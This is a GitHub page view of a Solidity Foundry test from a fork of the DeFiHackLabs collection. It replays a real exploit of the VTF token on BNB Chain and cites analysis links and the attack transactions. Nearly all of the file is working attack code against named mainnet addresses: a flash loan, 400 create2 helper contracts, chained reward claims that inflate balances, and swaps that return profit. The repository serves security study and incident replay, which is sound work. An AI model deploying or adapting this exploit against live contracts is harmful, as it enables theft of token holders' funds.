forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
VTF_exp.sol
120 lines (105 loc) · 3.91 KB
/
VTF_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1585575129936977920
// https://twitter.com/peckshield/status/1585572694241988609
// https://twitter.com/BeosinAlert/status/1585587030981218305
// @TX
// https://bscscan.com/tx/0xeeaf7e9662a7488ea724223c5156e209b630cdc21c961b85868fe45b64d9b086
// https://bscscan.com/tx/0xc2d2d7164a9d3cfce1e1dac7dc328b350c693feb0a492a6989ceca7104eef9b7
interface IVTF is IERC20{
function updateUserBalance(address _user) external;
}
interface IROUTER {
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}
contract claimReward{
IVTF VTF = IVTF(0xc6548caF18e20F88cC437a52B6D388b0D54d830D);
constructor(){
VTF.updateUserBalance(address(this));
}
function claim(address receiver) external{
VTF.updateUserBalance(address(this));
VTF.transfer(receiver, VTF.balanceOf(address(this)));
}
}
contract ContractTest is DSTest{
address constant dodo = 0x26d0c625e5F5D6de034495fbDe1F6e9377185618;
IVTF VTF = IVTF(0xc6548caF18e20F88cC437a52B6D388b0D54d830D);
IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
IROUTER Router = IROUTER(0x7529740ECa172707D8edBCcdD2Cba3d140ACBd85);
address [] public contractList;
CheatCodes constant cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
// ankr rpc bsc maybe unavailible, please use QuickNode
function setUp() public {
cheat.createSelectFork("bsc", 22535101);
}
function testExploit() public{
contractFactory();
// change time to pass time check
cheat.warp(block.timestamp + 2 * 24 * 60 * 60);
DVM(dodo).flashLoan(0, 100_000 * 1e18, address(this), new bytes(1));
emit log_named_decimal_uint(
"[End] Attacker USDT balance after exploit",
USDT.balanceOf(address(this)),
18
);
}
function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external{
USDTToVTF();
VTF.transfer(contractList[0], VTF.balanceOf(address(this)));
for(uint i = 0; i < contractList.length - 1; ++i){
(bool success, ) = contractList[i].call(abi.encodeWithSignature("claim(address)", contractList[i + 1]));
require(success);
}
uint index = contractList.length - 1;
(bool success, ) = contractList[index].call(abi.encodeWithSignature("claim(address)", address(this)));
require(success);
VTFToUSDT();
USDT.transfer(dodo, 100_000 * 1e18);
}
function USDTToVTF() internal{
USDT.approve(address(Router), type(uint).max);
address [] memory path = new address[](2);
path[0] = address(USDT);
path[1] = address(VTF);
Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
100_000 * 1e18,
0,
path,
address(this),
block.timestamp
);
}
function VTFToUSDT() internal{
VTF.approve(address(Router), type(uint).max);
address [] memory path = new address[](2);
path[0] = address(VTF);
path[1] = address(USDT);
Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
VTF.balanceOf(address(this)),
0,
path,
address(this),
block.timestamp
);
}
function contractFactory() public{
address _add;
bytes memory bytecode = type(claimReward).creationCode;
for(uint _salt = 0; _salt < 400; _salt++){
assembly{
_add := create2(0, add(bytecode, 32), mload(bytecode), _salt)
}
contractList.push(_add);
}
}
}